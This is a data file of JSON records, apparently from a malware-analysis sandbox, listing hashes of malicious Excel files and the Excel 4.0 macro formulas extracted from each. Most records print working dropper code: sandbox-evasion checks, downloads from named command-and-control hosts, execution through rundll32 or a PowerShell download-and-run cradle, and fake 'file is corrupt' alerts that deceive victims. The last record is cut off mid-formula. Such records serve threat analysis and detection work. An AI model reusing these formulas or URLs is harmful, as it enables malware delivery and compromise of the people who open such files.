{"version":"0.2","sample":{"sample":"","kind":"file","target":"7247986cc1fb0c555f55950b348069d1edde3aa47e5936717cf790d543973949"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"7247986cc1fb0c555f55950b348069d1edde3aa47e5936717cf790d543973949","filesize":152576,"md5":"9140492dc1d839681fc2c2cfe99c58fa","sha1":"ff61f3dc77e0b0c59bfd12787ed71b05c272dbff","sha256":"7247986cc1fb0c555f55950b348069d1edde3aa47e5936717cf790d543973949","sha512":"e36e57fcdf40ca09dc93379c0aacb2b3ff9521d5325a9491a55004e49f086ecb76c6acddb7873b00112a5432121af19e073b98472e91023f5aa97df6ef7fa8f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7247986cc1fb0c555f55950b348069d1edde3aa47e5936717cf790d543973949.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MCHYGs1oRo\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"72698e728ddc50a083b05cd6ee88b5d7f1c6369cbbc2f3b3c51abd9ffd24a2ba"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"72698e728ddc50a083b05cd6ee88b5d7f1c6369cbbc2f3b3c51abd9ffd24a2ba","filesize":212992,"md5":"296efa505619eb32a87ca4bf290bf521","sha1":"13285795d26e3b31777f905c7e3a0af408046f42","sha256":"72698e728ddc50a083b05cd6ee88b5d7f1c6369cbbc2f3b3c51abd9ffd24a2ba","sha512":"c7623b37b73ca34b9eccbdbd14613f5baa333d4d4780a08e339b8a16a2e3212f1ee37d882cc16b78cd59fa601ee0ba53a74f25fdf815f28cf5c252db83a39765","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"72698e728ddc50a083b05cd6ee88b5d7f1c6369cbbc2f3b3c51abd9ffd24a2ba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6zUOL1Cegf\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"726c5c8fede9cadc50c54e22bb1c363e29733d05c0b79962fba2a7a8eea2e946"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"726c5c8fede9cadc50c54e22bb1c363e29733d05c0b79962fba2a7a8eea2e946","filesize":168960,"md5":"c9270bdf9c5e3db64821a0d64e901137","sha1":"bad05721b343ba2a53eba9341cb2041e50a8582f","sha256":"726c5c8fede9cadc50c54e22bb1c363e29733d05c0b79962fba2a7a8eea2e946","sha512":"bf67b7c1a7145335f05342e5cb5ad2ed3d5e65a6330d10f09b7b4247285339d35464a6a83cfa6624db4fd32b3fb76796c5cb24f81d4ec157bc53954c0b3ef503","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"726c5c8fede9cadc50c54e22bb1c363e29733d05c0b79962fba2a7a8eea2e946.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VW5DuFNw24\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7279b97bf7cc651f47aee5151b333d7cd069cc0adac4f36322749d8bda3599d5"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"7279b97bf7cc651f47aee5151b333d7cd069cc0adac4f36322749d8bda3599d5","filesize":182784,"md5":"b06be437e5f930c1787c4373ff69bc2e","sha1":"8d6128f03093a4e7f2091b60f001a0ee058ceaa7","sha256":"7279b97bf7cc651f47aee5151b333d7cd069cc0adac4f36322749d8bda3599d5","sha512":"6389f3005b051d7c27b4db1c41d43b8171636d01e69dd09d5b4289ba879af9df43a4571aefe3685e8cd6d8c38ada39ca5393960497daa2da630931254c16de3f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7279b97bf7cc651f47aee5151b333d7cd069cc0adac4f36322749d8bda3599d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"728558c3b80150c6643a82c233fbf5b734b19b4126b116e45167df5f34fdf7eb"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"728558c3b80150c6643a82c233fbf5b734b19b4126b116e45167df5f34fdf7eb","filesize":185344,"md5":"c451cadddcf20c1cfb18673666baf016","sha1":"9c8a3b46ad59f5e11076fb22025f9d365bd5e619","sha256":"728558c3b80150c6643a82c233fbf5b734b19b4126b116e45167df5f34fdf7eb","sha512":"e083f40a0d7cdb5daa2c716de2224e81c56676ca3036e75cff4790704c0543372872b056e20365b54b716440d2756e2f784557a2d82968758bf82623f5782a34","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"728558c3b80150c6643a82c233fbf5b734b19b4126b116e45167df5f34fdf7eb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"728c86a38445b6a8044a74e253be558d10d765b882341f1257809fafa78c8f66"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"728c86a38445b6a8044a74e253be558d10d765b882341f1257809fafa78c8f66","filesize":116224,"md5":"a098c64424f9e3829c07d157779bc310","sha1":"52bd2e01146a6e87c3f89f9fe40b6edb7c9e9fe7","sha256":"728c86a38445b6a8044a74e253be558d10d765b882341f1257809fafa78c8f66","sha512":"06845d6578cdf60aa3554168b95ab975eb71941da5a4e452bcc324da3b804b4d731d6c607101f0eba946b75c3b8c4d7350a5f994fdbc9653af9f2de92b9ead35","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"728c86a38445b6a8044a74e253be558d10d765b882341f1257809fafa78c8f66.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"H1947ujTyP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7295f3d22dfc943a396c7ca0d6497654854d811030e5b280e9a019bccba07bbf"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"7295f3d22dfc943a396c7ca0d6497654854d811030e5b280e9a019bccba07bbf","filesize":206336,"md5":"c66eeafe77e6f81bc9a57a8fdd8a27c3","sha1":"122f5b41c9ed286db10234e51319718b71a08a62","sha256":"7295f3d22dfc943a396c7ca0d6497654854d811030e5b280e9a019bccba07bbf","sha512":"1ce4ff6cda6cbf5f554b02e2b794fa7e532b880d5b29bf0de740f89cc55f4d96ab4291a8e519efc7b1c6015eea64bccdee2bea44685b8488016e44894bca920d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7295f3d22dfc943a396c7ca0d6497654854d811030e5b280e9a019bccba07bbf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"W3pdJc5jBF\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"72984d873e3cd5fe620da1889d7dd3635f50e8a515f0106da49ccd5d1ed386c2"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"72984d873e3cd5fe620da1889d7dd3635f50e8a515f0106da49ccd5d1ed386c2","filesize":170496,"md5":"99a14c8ac2a3ac1b3214f82d2d8bed75","sha1":"34ae7bc90efdf65e730d3729d4f81b928ce643f5","sha256":"72984d873e3cd5fe620da1889d7dd3635f50e8a515f0106da49ccd5d1ed386c2","sha512":"28ea5922e97c76186706d4d9d1e0d0043057776870bfdc775d0e265b88d84dacb9b1bf7d2eedbb8c9aadbf14f0deffd60e3ae9fbdaac7b9ef74897b4eec65d08","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"72984d873e3cd5fe620da1889d7dd3635f50e8a515f0106da49ccd5d1ed386c2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gvMYGpcru8\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"72b97f15cd92744abe6287f04e1f66dd579215f02886a3e6c530e0714718e7de"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"72b97f15cd92744abe6287f04e1f66dd579215f02886a3e6c530e0714718e7de","filesize":167936,"md5":"095998e8667584e19db84bd198f7d536","sha1":"3ac6cb1998a14b36e54c14b4113b0ad0396b4578","sha256":"72b97f15cd92744abe6287f04e1f66dd579215f02886a3e6c530e0714718e7de","sha512":"20d33b1b2bf7c44ce69f74dd51022ee2630cc101723875688939400d776e5633132b220591d5e4c2b795630b1227b220675d7065bec2a90a64abb87f72225892","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"72b97f15cd92744abe6287f04e1f66dd579215f02886a3e6c530e0714718e7de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KSSp7N8Xyw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"72be72f6e6edfd724e229bcc6cd0397a216fb3db75341dd712539b86889212b9"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"72be72f6e6edfd724e229bcc6cd0397a216fb3db75341dd712539b86889212b9","filesize":185344,"md5":"1d892c3ed46bcdc918b06595860a8b2f","sha1":"42b2477ce1bf87da663803e515cebc26c65d65c8","sha256":"72be72f6e6edfd724e229bcc6cd0397a216fb3db75341dd712539b86889212b9","sha512":"5c78c5c862b2b255a1ca8e08b3f9e4606624cbe51443ff4201e0d9da84d060f87d6cad73bf0f27e3efb400bbfe4fce28b6bddd14512a1c4b836cc8fcd37be5be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"72be72f6e6edfd724e229bcc6cd0397a216fb3db75341dd712539b86889212b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"72beff7b1efd68aaa24693fec8af6677a4dd400f726cc397f0eb8d813a35c46d"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"72beff7b1efd68aaa24693fec8af6677a4dd400f726cc397f0eb8d813a35c46d","filesize":112128,"md5":"a2bdb261b1aa91ab78559534554416df","sha1":"45c8aa8c26ee7cf17ec9acb5329453efd17abb77","sha256":"72beff7b1efd68aaa24693fec8af6677a4dd400f726cc397f0eb8d813a35c46d","sha512":"e8d50e834bee4e5ed7fce297406ff87bbdf41910218edf36fac60f56cf665998aa1ba60d4e72e2d7d51dd0bdc0e96ae7360496917897d4f3ecfe30692cc20070","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"72beff7b1efd68aaa24693fec8af6677a4dd400f726cc397f0eb8d813a35c46d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"72d11ab604da03773a33e4058e3051ad20e46d72fa3f2be033bc7fa8e034b9e4"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"72d11ab604da03773a33e4058e3051ad20e46d72fa3f2be033bc7fa8e034b9e4","filesize":185344,"md5":"8a8f5626862abdb2ad259d0e63973ca1","sha1":"78458249078178e136c1d935b9b5227d656adc06","sha256":"72d11ab604da03773a33e4058e3051ad20e46d72fa3f2be033bc7fa8e034b9e4","sha512":"62311ba4e1739b7a0abb0067e636f8c18c6776ad1d07cfde06ec116f9962fcca906aa65583e943b0ac9635eee8bad46a70d20e319e3b58833d362deb467e1cba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"72d11ab604da03773a33e4058e3051ad20e46d72fa3f2be033bc7fa8e034b9e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"72e0fe048621c2178d17f9aea2d84183982f8facf15dfdfab94d0699de6a80ee"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"72e0fe048621c2178d17f9aea2d84183982f8facf15dfdfab94d0699de6a80ee","filesize":209920,"md5":"a1f682977f48d252c007c073f27aeb3b","sha1":"6fa41dc07de38e36d92f4de7a7c13b8b2f2033bd","sha256":"72e0fe048621c2178d17f9aea2d84183982f8facf15dfdfab94d0699de6a80ee","sha512":"7518663411f5c2c52960d4051ef75c8f25b22ce81d7bc94bfb812d42d0678463c6ea7b1fbd9bd5add9de75e96d5e36fb8537a47b51a0e2b40aa281f989566a07","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"72e0fe048621c2178d17f9aea2d84183982f8facf15dfdfab94d0699de6a80ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"32lGDZgOMB\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"72f1fab3af06797f05090b729b728cf353d4f92f5d0eb4ae07639e915f77aeca"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"72f1fab3af06797f05090b729b728cf353d4f92f5d0eb4ae07639e915f77aeca","filesize":154118,"md5":"ed95adf5b1802f62cdaa97d1531b0ecb","sha1":"542bd69c4918e3843a339411dc230ee083edc87b","sha256":"72f1fab3af06797f05090b729b728cf353d4f92f5d0eb4ae07639e915f77aeca","sha512":"0b65b5eb2ba927989bf8702e1c0bf89083ee176a285d91b710806c44bb9b3e6ea6948754d5ff7cc50257c97f4bcc4be687836c2d48e1a26b4631f8606a0832e3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"72f1fab3af06797f05090b729b728cf353d4f92f5d0eb4ae07639e915f77aeca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nEXEC(\"powershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://unoflock.ru/wp-admin/css/d')\")\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7302041ab82335e39ef451f8753eb54c702835f4b0f9b00d841d58401c967c10"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"7302041ab82335e39ef451f8753eb54c702835f4b0f9b00d841d58401c967c10","filesize":152576,"md5":"e74af12148cdb36c7edf2834db83e995","sha1":"33ce6bfb55b62dc88be64af6f85d2aa4d0799971","sha256":"7302041ab82335e39ef451f8753eb54c702835f4b0f9b00d841d58401c967c10","sha512":"11d84eba422fb376931951a9743ee82415ba26ac1afef7231b0b6775a333618fff787d4822b1a527ef330f56d1702d5bd7d41de1ecee7fae3848e490c9f77142","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7302041ab82335e39ef451f8753eb54c702835f4b0f9b00d841d58401c967c10.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2tBO44U7cl\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73187e9ca143152f94011ba8628d0a434c083c7fb64992a6c781cdd62655fff3"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"73187e9ca143152f94011ba8628d0a434c083c7fb64992a6c781cdd62655fff3","filesize":209920,"md5":"3dfb7c407b27c7ab2d02b7a8299baccb","sha1":"549f19fd02462f2bebd9557e51ec5326ee756c1a","sha256":"73187e9ca143152f94011ba8628d0a434c083c7fb64992a6c781cdd62655fff3","sha512":"a3222b82f7115e76822efa2d366f3cb0f8c19415da00f30ed3f34be1c85a10912bbb418b52e0aa7163bdc88c5cf684ac89b17b265124cb805ce7b4b57234fb3d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73187e9ca143152f94011ba8628d0a434c083c7fb64992a6c781cdd62655fff3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 